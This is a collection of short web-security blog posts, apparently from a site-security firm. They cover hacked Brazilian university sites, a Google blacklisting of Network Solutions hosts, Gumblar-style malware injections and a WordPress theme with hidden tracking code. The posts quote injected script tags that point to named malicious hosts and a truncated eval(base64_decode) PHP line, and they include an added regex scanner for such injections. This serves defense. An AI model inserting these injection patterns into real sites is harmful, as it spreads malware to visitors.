UFSC.br – Brazilian University hosting SEO SPAM

UFSC.br (the Brazilian Federal University in Santa Catarina), one of the biggest universities in Brazil, is hosting SEO SPAM on almost all of its departmental web sites:

http://www.sead.ufsc.br – Department for distance education
http://cco.inf.ufsc.br/ – Computer science department (using WordPress 2.2)
http://www.lec.ufsc.br/ – Engineering department
http://emc.ufsc.br – Mechanical engineering department
http://www.ndi.ufsc.br/ – Department for child development
http://www.bu.ufsc.br/ – Library department
www.dssmovimentossociais.ufsc.br

http://www.infosam.ufsc.br/

And I could go on and on with this list. Most of them are using old versions of WordPress and Joomla, which explains how they got hacked.



Blacklisted sites at Netsol

In the last few days many sites hosted at Network Solutions got blacklisted by Google. In all of them the report from Google was:

URL: sitename
Last checked: June 2, 2010
General problem
When Google last tested this page, no content was returned from your server.
Instead, the browser was redirected to a malicious web page. It is likely
that your server configuration has been modified.

On the ones that we manually checked, the sites were clean and malware-free (no redirection). They were all hosted at the IP address 205.178.145.65, and it looks like their other servers were not affected.

What happened? It seems that either that server got compromised, affecting all sites on it, or there is a bug in Google’s malware checker.

If your site got blacklisted and it says on the warning page something along these lines: (and you are hosting at that IP address)


Web site security – It starts with your desktop

If you have a web site and you want it to be secure, the first place you have to protect is your desktop.

Recently (well, since 2009), a large number of sites have been infected with malware and blacklisted due to a few desktop viruses (generally called Gumblar, port 8080, etc.). These viruses steal your FTP password and do the following things:

Infects all .js files on your site with entries like this one:

document.write( <script src="http://wap.northernplumbingandheating.com/assets/postinfo.php
document.write( <script src=http://salsafestival-berlin.de/_fpclass/BannerWebseite2009.php

It infects every .html file with entries similar to this:

script src="http://wap.northernplumbingandheating.com/assets/postinfo.php"
script src="http://shopping-dubai.com/images/runActiveContent.php"
script src="http://stb-umhau.de/images/muffin35.php"
script src="http://salsafestival-berlin.de/_fpclass/BannerWebseite2009.php"

And it infects every PHP file with code similar to this one:

eval(  base64_decode(" aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEd
MT0JBTF..
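
As an added example (not from the original post), here is a small Python scanner for the three injection styles listed above, meant to run over a local copy of a site. The regexes, rule names and the `example.invalid` sample files are assumptions constructed for illustration and will need tuning against real content.

```python
import re
from pathlib import Path

# Heuristic rules for the three injection styles described above.
# Assumed patterns for illustration, not signatures from the original post.
RULES = {
    # .js files: document.write() emitting a <script> tag with a remote src
    "js-document-write": re.compile(
        r"document\.write\s*\([^)]{0,40}<script[^>]*\bsrc\s*=\s*[\"']?https?://", re.I),
    # .html files: <script> tag whose remote source is a .php endpoint
    "html-remote-php-script": re.compile(
        r"<script[^>]*\bsrc\s*=\s*[\"']?https?://[^\"'\s>]+\.php\b", re.I),
    # .php files: eval() wrapped directly around base64_decode()
    "php-eval-base64": re.compile(r"eval\s*\(\s*base64_decode\s*\(", re.I),
}
# Which rules are checked for which file extension.
APPLIES_TO = {
    ".js": ("js-document-write",),
    ".html": ("html-remote-php-script",),
    ".htm": ("html-remote-php-script",),
    ".php": ("php-eval-base64", "html-remote-php-script"),
}

def scan_text(suffix, text):
    """Return the names of the rules that match text for this file type."""
    rules = APPLIES_TO.get(suffix.lower(), ())
    return [name for name in rules if RULES[name].search(text)]

def scan_tree(root):
    """Walk a local copy of the site; map relative path -> matched rules."""
    hits = {}
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in APPLIES_TO:
            found = scan_text(path.suffix, path.read_text(errors="replace"))
            if found:
                hits[path.relative_to(root).as_posix()] = found
    return hits

# Constructed samples; example.invalid stands in for the injected hosts.
SAMPLES = {
    "menu.js": "var a = 1;\ndocument.write('<script src=\"http://example.invalid/x/postinfo.php\"></script>');",
    "index.html": "<html><body>hi</body><script src=\"http://example.invalid/images/a.php\"></script></html>",
    "config.php": "<?php eval(base64_decode(\"Y29uc3RydWN0ZWQ=\")); ?>",
    "clean.html": "<script src=\"https://example.invalid/static/app.js\"></script>",
}

def scan_samples():
    """Run the rules over the constructed samples above."""
    return {name: scan_text(Path(name).suffix, body) for name, body in SAMPLES.items()}
```

A hit only marks a file for manual review; comparing flagged files against a known-good backup confirms whether they were modified.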



Google top 1000 sites: Interesting stats about them

Google recently published a list with the top 1000 most visited web sites in the world. We found that list very interesting and decided to take a closer look at them.

These are the stats we took:

  1. Web servers in use
  2. Programming language in use
  3. Sites using WordPress
  4. Sites using jQuery
  5. Sites using Google AdSense
  6. Sites using Google Analytics
  7. Sites that don’t work without the www
  8. Sites using China Cache

A few of these numbers really amazed us. Nginx, for example, was used in 15% of the sites, very close to IIS with only 17%. jQuery is being used in almost 30% of the top sites and 42% are using Google Analytics.


WordPress user: Be careful where you get your theme from

WordPress themes are not just design templates: they contain PHP code and must be validated before use. That is not only because of bugs; some may contain malicious code as well, especially if you download them from random web sites and not from WordPress.org (not saying that every theme at WordPress.org is safe).

One example popped up this week, regarding the themes from http://hirewordpressexperts.com/. They added some hidden code inside their themes to track which sites are using them (and track the users as well). However, their tracking server went offline and every site using it got this error on the sidebar:

Warning: file_get_contents(
http://24365online.com/_YTG_yu/_dl/get_info.php?host=site&referer=&visitor_ip=ip)

